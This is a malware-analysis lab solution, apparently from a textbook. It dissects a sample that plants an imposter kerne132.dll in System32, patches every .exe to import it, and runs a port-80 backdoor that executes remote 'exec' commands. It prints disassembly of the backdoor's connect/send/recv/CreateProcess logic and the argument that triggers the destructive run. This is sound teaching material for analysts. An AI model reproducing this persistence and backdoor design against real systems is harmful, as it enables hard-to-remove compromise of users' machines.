This program achieves persistence by writing a DLL to C:\Windows\System32 and modifying every .exe file on the system to import that DLL.
The program is hard-coded to use the filename kerne132.dll, which makes a good signature. (Note the use of the number
1 instead of the letter l.) The program uses a hard-coded
mutex named SADFHUHF.
The purpose of this program is to create a difficult-to-remove backdoor that connects to a remote host. The backdoor has two commands: one to execute a command and one to sleep.
This program is very hard to remove because it infects every .exe file on the system. It’s probably best in this case to restore from backups. If restoring from backups is particularly difficult, you could leave the malicious kerne132.dll file and modify it to remove the malicious content. Alternatively, you could copy kernel32.dll and name it kerne132.dll, or write a program to undo all changes to the PE files.
First, we’ll look at Lab07-03.exe using basic static analysis techniques. When we run Strings on the executable, we get the usual invalid strings and the imported functions. We also get days of the week, months of the year, and other strings that are part of the library code, not part of the malicious executable.
The following listing shows that the code has several interesting strings.
kerne132.dll .exe WARNING_THIS_WILL_DESTROY_YOUR_MACHINE C:\Windows\System32\Kernel32.dll Lab07-03.dll Kernel32. C:\windows\system32\kerne132.dll C:\*
The string kerne132.dll is clearly designed to look like kernel32.dll but replaces the l with a 1.
For the remainder of this section, the imposter kerne132.dll will be in bold to make it easier to differentiate from kernel32.dll.
The string Lab07-03.dll tells us that the
.exe may access the DLL for this lab in some way. The string WARNING_THIS_WILL_DESTROY_YOUR_MACHINE is interesting, but it’s
actually an artifact of the modifications made to this malware for this book. Normal malware would
not contain this string, and we’ll see more about its usage in the malware later.
Next, we examine the imports for Lab07-03.exe. The most interesting of these are as follows:
CreateFileA CreateFileMappingA MapViewOfFile IsBadReadPtr UnmapViewOfFile CloseHandle FindFirstFileA FindClose FindNextFileA CopyFileA
The imports CreateFileA, CreateFileMappingA, and MapViewOfFile tell us that
this program probably opens a file and maps it into memory. The FindFirstFileA and FindNextFileA combination tells us
that the program probably searches directories and uses CopyFileA
to copy files that it finds. The fact that the program does not import
Lab07-03.dll (or use any of the functions from the DLL), LoadLibrary, or GetProcAddress suggests
that it probably doesn’t load that DLL at runtime. This behavior is suspect and something we
need to examine as part of our analysis.
Next, we check the DLL for any interesting strings and imports and find a few strings worth investigating, as follows:
hello 127.26.152.13 sleep exec
The most interesting string is an IP address, 127.26.152.13, that the malware might connect to. (You can set up your network-based
sensors to look for activity to this address.) We also see the strings hello, sleep, and exec, which we should examine when we open the program in IDA Pro.
Next, we check the imports for Lab07-03.dll. We see that the imports from
ws2_32.dll contain all the functions necessary to send and receive data over a
network. Also of note is the CreateProcess function, which tells
us that this program may create another process.
We also check the exports for Lab07-03.dll and see, oddly, that it has
none. Without any exports, it can’t be imported by another program, though a program could
still call LoadLibrary on a DLL with no exports. We’ll keep
this in mind when we look more closely at the DLL.
We next try basic dynamic analysis. When we run the executable, it exits quickly without much
noticeable activity. (We could try to run the DLL using rundll32,
but because the DLL has no exports, that won’t work.) Unfortunately, basic dynamic analysis
doesn’t tell us much.
The next step is to perform analysis using IDA Pro. Whether you start with the DLL or EXE is a matter of preference. We’ll start with the DLL because it’s simpler than the EXE.
When looking at the DLL in IDA Pro, we see no exports, but we do see an entry point. We should
navigate to DLLMain, which is automatically labeled by IDA Pro.
Unlike the prior two labs, the DLL has a lot of code, and it would take a really long time to go
through each instruction. Instead, we use a simple trick and look only at call instructions, ignoring all other instructions. This can help you get a quick view of
the DLL’s functionality. Let’s see what the code would look like with only the relevant
call instructions.
10001015 call __alloca_probe 10001059 call ds:OpenMutexA 1000106E call ds:CreateMutexA 1000107E call ds:WSAStartup 10001092 call ds:socket 100010AF call ds:inet_addr 100010BB call ds:htons 100010CE call ds:connect 10001101 call ds:send 10001113 call ds:shutdown 10001132 call ds:recv 1000114B call ebp ; strncmp 10001159 call ds:Sleep 10001170 call ebp ; strncmp 100011AF call ebx ; CreateProcessA 100011C5 call ds:Sleep
The first call is to the library function __alloca_probe to allocate stack on the space. All we can tell here is that this function
uses a large stack. Following this are calls to OpenMutexA and
CreateMutexA, which, like the malware in Lab 7-1 Solutions, are here to ensure that only one copy of the malware is running at
one time.
The other listed functions are needed to establish a connection with a remote socket, and to
transmit and receive data. This function ends with calls to Sleep
and CreateProcessA. At this point, we don’t know what data
is sent or received, or which process is being created, but we can guess at what this DLL does. The
best explanation for a function that sends and receives data and creates processes is that it is
designed to receive commands from a remote machine.
Now that we know what this function is doing, we need to see what data is being sent and
received. First, we check the destination address of the connection. A few lines before the connect call, we see a call to inet_addr with the fixed IP address of 127.26.152.13.
We also see that the port argument is 0x50, which is port 80, the
port normally used for web traffic.
But what data is being communicated? The call to send is
shown in the following listing.
100010F3 push 0 ; flags
100010F5 repne scasb
100010F7 not ecx
100010F9 dec ecx
100010FA push ecx ; len
100010FB push offset ❶buf ; "hello"
10001100 push esi ; s
10001101 call ds:sendAs you can see at ❶, the buf argument stores the data to be sent over the network, and IDA Pro recognizes that the
pointer to buf represents the string "hello" and labels it as such. This appears to be a greeting that the victim machine
sends to let the server know that it’s ready for a command.
Next, we can see what data the program is expecting in response, as follows:
10001124 lea ❸eax, [esp+120Ch+buf] 1000112B push 1000h ; len 10001130 push eax ; ❷buf 10001131 push esi ; s 10001132 call ❶ds:recv
If we go to the call to recv
❶, we see that the buffer on the stack has been labeled
by IDA Pro at ❷. Notice that the instruction that first
accesses buf is an lea
instruction at ❸. The instruction doesn’t
dereference the value stored at that location, but instead only obtains a pointer to that location. The call to
recv will store the incoming network traffic on the stack.
Now we must determine what the program is doing with the response. We see the buffer value checked a few lines later at ❶, as shown in the following listing.
1000113C ❶lea ecx, [esp+1208h+buf] 10001143 push 5 ; size_t 10001145 push ecx ; char * 10001146 push offset aSleep ; "sleep" 1000114B ❷call ebp ; strncmp 1000114D add esp, 0Ch 10001150 ❸test eax, eax 10001152 jnz short loc_10001161 10001154 push 60000h ; dwMilliseconds 10001159 call ds:Sleep
The buffer accessed at ❶ is the same as the one
from the previous listing, even though the offset from ESP is different (esp+1208+buf in one and esp+120C+buf in the other).
The difference is due to the fact that the size of the stack has changed. IDA Pro labels both
buf to make it easy to tell that they’re the same
value.
This code calls strncmp at ❷, and it checks to see if the first five characters are the string sleep. Then, immediately after the function call, it checks to see if the
return value is 0 at ❸; if so, it calls the Sleep function to sleep for about 394 seconds. This tells us that if the remote
server sends the command sleep, the program will call the
Sleep function.
We see the buffer accessed again a few instructions later, as follows:
10001161 lea edx, [esp+1208h+buf] 10001168 push 4 ; size_t 1000116A push edx ; char * 1000116B push offset aExec ; "exec" 10001170 ❶call ebp ; strncmp 10001172 add esp, 0Ch 10001175 test eax, eax 10001177 ❷jnz short loc_100011B6 10001179 mov ecx, 11h 1000117E lea edi, [esp+1208h+StartupInfo] 10001182 rep stosd 10001184 lea eax, [esp+1208h+ProcessInformation] 10001188 lea ecx, [esp+1208h+StartupInfo] 1000118C push eax ; lpProcessInformation 1000118D push ecx ; lpStartupInfo 1000118E push 0 ; lpCurrentDirectory 10001190 push 0 ; lpEnvironment 10001192 push 8000000h ; dwCreationFlags 10001197 push 1 ; bInheritHandles 10001199 push 0 ; lpThreadAttributes 1000119B lea edx, [esp+1224h+❹CommandLine] 100011A2 push 0 ; lpProcessAttributes 100011A4 push edx ; lpCommandLine 100011A5 push 0 ; lpApplicationName 100011A7 mov [esp+1230h+StartupInfo.cb], 44h 100011AF ❸call ebx ; CreateProcessA
This time, we see that the code is checking to see if the buffer begins with exec. If so, the strncmp function will
return 0, as shown at ❶, and the code will fall through
the jnz instruction at ❷ and call the CreateProcessA function.
There are a lot of parameters to the CreateProcessA
function shown at ❸, but the most interesting is the
CommandLine parameter at ❹, which tells us the process that will be created. The listing suggests that the string
in CommandLine was stored on the stack somewhere earlier in code,
and we need to determine where. We search backward in our code to find CommandLine by placing the cursor on the CommandLine
operator to highlight all instances within this function where the CommandLine value is accessed. Unfortunately, when you look through the whole function,
you’ll see that the CommandLine pointer does not seem to be
accessed or set elsewhere in the function.
At this point, we’re stuck. We see that CreateProcessA is called and that the program to be run is stored in CommandLine, but we don’t see CommandLine written anywhere. CommandLine must be
written prior to being used as a parameter to CreateProcessA, so
we still have some work to do.
This is a tricky case where IDA Pro’s automatic labeling has actually made it more
difficult to identify where CommandLine was written. The IDA Pro
function information shown in the following listing tells us that CommandLine corresponds to the value of 0x0FFB at
❷.
10001010 ; BOOL __stdcall DllMain(...) 10001010 _DllMain@12 proc near 10001010 10001010 hObject = dword ptr -11F8h 10001010 name = sockaddr ptr -11F4h 10001010 ProcessInformation=_PROCESS_INFORMATION ptr -11E4h 10001010 StartupInfo = _STARTUPINFOA ptr -11D4h 10001010 WSAData = WSAData ptr -1190h 10001010 buf = ❶ byte ptr -1000h 10001010 CommandLine = ❷ byte ptr -0FFBh 10001010 arg_4 = dword ptr 8
Remember our receive buffer started at 0x1000 ❶,
and that this value is set using the lea instruction, which tells
us that the data itself is stored on the stack, and is not just a pointer to the data. Also, the
fact that 0x0FFB is 5 bytes into our receive buffer tells us that
the command to be executed is whatever is stored 5 bytes into our receive buffer. In this case, that
means that the data received from the remote server would be exec
FullPathOfProgramToRun. When the malware
receives the exec
FullPathOfProgramToRun command string from
the remote server, it will call CreateProcessA with
FullPathOfProgramToRun.
This brings us to the end of this function and DLL. We now know that this DLL implements backdoor functionality that allows the attacker to launch an executable on the system by sending a response to a packet on port 80. There’s still the mystery of why this DLL has no exported functions and how this DLL is run, and the content of the DLL offers no explanations, so we’ll need to defer those questions until later.
Next, we navigate to the main method in the executable. One
of the first things we see is a check for the command-line arguments, as shown in the following
listing.
00401440 mov eax, [esp+argc] 00401444 sub esp, 44h 00401447 ❶cmp eax, 2 0040144A push ebx 0040144B push ebp 0040144C push esi 0040144D push edi 0040144E ❷jnz loc_401813 00401454 mov eax, [esp+54h+argv] 00401458 mov esi, offset aWarning_this_w ; "WARNING_THIS_WILL_DESTROY_YOUR_MACHINE" 0040145D ❸mov eax, [eax+4] 00401460 ; CODE XREF: _main+42 j 00401460 ❹mov dl, [eax] 00401462 mov bl, [esi] 00401464 mov cl, dl 00401466 cmp dl, bl 00401468 jnz short loc_401488 0040146A test cl, cl 0040146C jz short loc_401484 0040146E mov dl, [eax+1] 00401471 mov bl, [esi+1] 00401474 mov cl, dl 00401476 cmp dl, bl 00401478 jnz short loc_401488 0040147A add eax, 2 0040147D add esi, 2 00401480 test cl, cl 00401482 ❺jnz short loc_401460 00401484 ; CODE XREF: _main+2C j 00401484 xor eax, eax 00401486 jmp short loc_40148D
The first comparison at ❶ checks to see if the
argument count is 2. If the argument count is not 2, the code jumps at ❷ to another section of code, which prematurely exits. (This is
what happened when we tried to perform dynamic analysis and the program ended quickly.) The program
then moves argv[1] into EAX at ❸ and the "WARNING_THIS_WILL_DESTROY_YOUR_MACHINE"
string into ESI. The loop between ❹ and ❺ compares the values stored in ESI and EAX. If they are not the
same, the program jumps to a location that will return from this function without doing anything
else.
We’ve learned that this program exits immediately unless the correct parameters are specified on the command line. The correct usage of this program is as follows:
Lab07-03.exe WARNING_THIS_WILL_DESTROY_YOUR_MACHINE
Malware that has different behavior or requires command-line arguments is realistic, although this message is not. The arguments required by malware will normally be more cryptic. We chose to use this argument to ensure that you won’t accidentally run this on an important machine, because it can damage your computer and is difficult to remove.
At this point, we could go back and redo our basic dynamic analysis and enter the correct parameters to get the program to execute more of its code, but to keep the momentum going, we’ll continue with the static analysis. If we get stuck, we can perform basic dynamic analysis.
Continuing in IDA Pro, we see calls to CreateFile, CreateFileMapping, and MapViewOfFile
where it opens kernel32.dll and our DLL Lab07-03.dll.
Looking through this function, we see a lot of complicated reads and writes to memory. We could
carefully analyze every instruction, but that would take too long, so let’s try looking at the
function calls first.
We see two other function calls: sub_401040 and sub_401070. Each of these functions is relatively short, and neither calls
any other function. The functions are comparing memory, calculating offsets, or writing to memory.
Because we’re not trying to determine every last operation of the program, we can skip the
tedious memory-operation functions. (Analyzing time-consuming functions like these is a common trap
and should be avoided unless absolutely necessary.) We also see a lot of arithmetic, as well as
memory movement and comparisons in this function, probably within the two open files
(kernel32.dll and Lab07-03.dll). The program is reading
and writing the two open files. We could painstakingly track every instruction to see what changes
are being made, but it’s much easier to skip over that for now and use dynamic analysis to
observe how the files are accessed and modified.
Scrolling down in IDA Pro, we see more interesting code that calls Windows API functions.
First, it calls CloseHandle on the two open files, so we know
that the malware is finished editing those files. Then it calls CopyFile, which copies Lab07-03.dll and places it in
C:\Windows\System32\kerne132.dll, which is clearly meant to look like
kernel32.dll. We can guess that kerne132.dll will be used to run in place of
kernel32.dll, but at this point, we don’t know how kerne132.dll will be loaded.
The calls to CloseHandle and CopyFile tell us that this portion of code is complete, and the next section of code
probably performs a separate logical task. We continue to look through the main method, and near the end, we see another function call that takes the string
argument C:\\*, as follows:
00401806 push offset aC ; "C:\\*" 0040180B call sub_4011E0
Unlike the other functions called by main, sub_4011E0 calls several other imported functions and looks interesting.
Navigating to sub_4011E0, we would expect to see that IDA Pro has
named the first argument to the function as arg_0, but it has
labeled it lpFilename instead. It knows that it is a filename,
because it is used as a parameter to a Windows API function that accepts a filename as a parameter.
One of the first things this function does is call FindFirstFile
on C:\\* to search the C: drive.
Following the call to FindFirstFile, we see a lot of
arithmetic and comparisons. This is another tedious and time-consuming function that we should skip
and return to only if we need more information later. The first call we see (other than malloc) is to sub_4011e0, the function
that we’re currently analyzing, which tells us that this is a recursive function that calls
itself. The next function called is stricmp at ❶, as follows:
004013F6 ❶call ds:_stricmp 004013FC add esp, 0Ch 004013FF test eax, eax 00401401 jnz short loc_40140C 00401403 push ebp ; lpFileName 00401404 ❷call sub_4010A0
The arguments to the stricmp function are pushed onto the
stack about 30 instructions before the function call, but you can still find them by looking for the
most recent push instructions. The string comparison checks a
string against .exe, and then it calls the function sub_4010a0 at ❷ to see if they
match.
We’ll finish reviewing this function before we see what sub_4010a0 does. Digging further, we see a call to FindNextFileA, and then we see a jump call, which
indicates that this functionality is performed in a loop. At the end of the function, FindClose is called, and then the function ends with some
exception-handling code.
At this point, we can say with high confidence that this function is searching the C: drive for .exe files and doing something if a file has an .exe extension. The recursive call tells us that it’s probably searching the whole filesystem. We could go back and verify the details to be sure, but this would take a long time. A much better approach is to perform the basic dynamic analysis with Process Monitor (procmon) to verify that it’s searching every directory for files ending in .exe.
In order to see what this program is doing to .exe files, we need to
analyze the function sub_4010a0, which is called when the
.exe extension is found. sub_4010a0 is a
complex function that would take too long to analyze carefully. Instead, we once again look only at
the function calls. Here, we see that it first calls CreateFile,
CreateFileMapping, and MapViewOfFile to map the entire file into memory. This tells us that the entire file is
mapped into memory space, and the program can read or write the file without any additional function
calls. This complicates analysis because it’s harder to tell how the file is being modified. Again, we’ll just move quickly through this function and use dynamic
analysis to see what changes are made to the file.
Continuing to review the function, we see more arithmetic calls to IsBadPtr, which verify that the pointer is valid. Then we see a call to stricmp as shown at ❶ in the
following listing.
0040116E push offset aKernel32_dll ; ❷"kernel32.dll" 00401173 ❻push ebx ; char * 00401174 ❶call ds:_stricmp 0040117A add esp, 8 0040117D test eax, eax 0040117F jnz short loc_4011A7 00401181 mov edi, ebx 00401183 or ecx, 0FFFFFFFFh 00401186 ❸repne scasb 00401188 not ecx 0040118A mov eax, ecx 0040118C mov esi, offset dword_403010 00401191 ❺mov edi, ebx 00401193 shr ecx, 2 00401196 ❹rep movsd 00401198 mov ecx, eax 0040119A and ecx, 3 0040119D rep movsb
At this call to stricmp, the program checks for a string
value of kernel32.dll at ❷. A few instructions later, we see that the program calls repne scasb at ❸ and rep movsd at ❹, which are functionally
equivalent to the strlen and memcpy functions. In order to see which memory address is being written by the memcpy call, we need to determine what’s stored in EDI, the register
used by the rep movsd instruction. EDI is loaded with the value
from EBX at ❺, so we need to see where EBX is
set.
We see that EBX is loaded with the value that we passed to stricmp at ❻. This means that if the function
finds the string kernel32.dll, the code replaces it with
something. To determine what it replaces that string with, we go to the rep
movsd instruction and see that the source is at offset dword_403010.
It doesn’t make sense for a DWORD value to overwrite
a string of kernel32.dll, but it does make sense for one string
value to overwrite another. The following listing shows what is stored at dword_403010.
00403010 dword_403010 dd 6E72656Bh ; DATA XREF: 00403014 dword_403014 dd 32333165h ; DATA XREF: _main+1B9r 00403018 dword_403018 dd 6C6C642Eh ; DATA XREF: _main+1C2r 0040301C dword_40301C dd 0 ; DATA XREF: _main+1CBr
You should recognize that hex values beginning with 3, 4, 5, 6, or 7 are ASCII characters. IDA
Pro has mislabeled our data. If we put the cursor on the same line as dword_403010 and press the A key on the keyboard, it will convert the data into the
string kerne132.dll.
Now we know that the executable searches through the filesystem for every file ending in
.exe, finds a location in that file with the string kernel32.dll, and replaces it with kerne132.dll. From our previous analysis, we know
that Lab07-03.dll will be copied into C:\Windows\System32
and named kerne132.dll. At this point, we
can conclude that the malware modifies executables so that they access kerne132.dll instead of kernel32.dll. This
indicates that kerne132.dll is loaded by
executables that are modified to load kerne132.dll instead of kernel32.dll.
At this point, we’ve reached the end of the program and should be able to use dynamic analysis to fill in the gaps. We can use procmon to confirm that the program searches the filesystem for .exe files and then opens them. (Procmon will show the program opening every executable on the system.) If we select an .exe file that has been opened and check the imports directory, we confirm that the imports from kernel32.dll have been replaced with imports from kerne132.dll. This means that every executable on the system will attempt to load our malicious DLL—every single one.
Next, we check to see how the program modified kernel32.dll and
Lab07-03.dll. We can calculate the MD5 hash of
kernel32.dll before and after the program runs to clearly see that this malware
does not modify kernel32.dll. When we open the modified
Lab07-03.dll (now named kerne132.dll), we see that it now has an export section. Opening it
in PEview, we see that it exports all the functions that kernel32.dll exported,
and that these are forwarded exports, so that the actual functionality is still in
kernel32.dll. The overall effect of this modification is that whenever an
.exe file is run on this computer, it will load the malicious kerne132.dll and run the code in DLLMain. Other than that, all functionality will be unchanged, and the
code will execute as if the program were still calling the original
kernel32.dll.
We have now analyzed this malware completely. We could create host- and network-based signatures based on what we know, or we could write a malware report.
We did gloss over a lot of code in this analysis because it was too complicated, but did we
miss anything? We did, but nothing of importance to malware analysis. All of the code in the
main method that accessed kernel32.dll and
Lab07-03.dll was parsing the export section of
kernel32.dll and creating an export section in
Lab07-03.dll that exported the same functions and created forward entries to
kernel32.dll.
The malware needs to scan kernel32.dll for all the exports and create forward entries for the imposter kerne132.dll, because kernel32.dll is different on different systems. The tailored version of kerne132.dll exports exactly the same functions as the real kernel32.dll. In the function that modified the .exe, the code found the import directory, so it could modify the import to kernel32.dll and set the bound import table to zero so that it would not be used.
With careful and time-consuming analysis, we could determine what all of these functions do. However, when analyzing malware, time is often of the essence, and you should typically focus on what’s important. Try not to worry about the little details that won’t affect your analysis.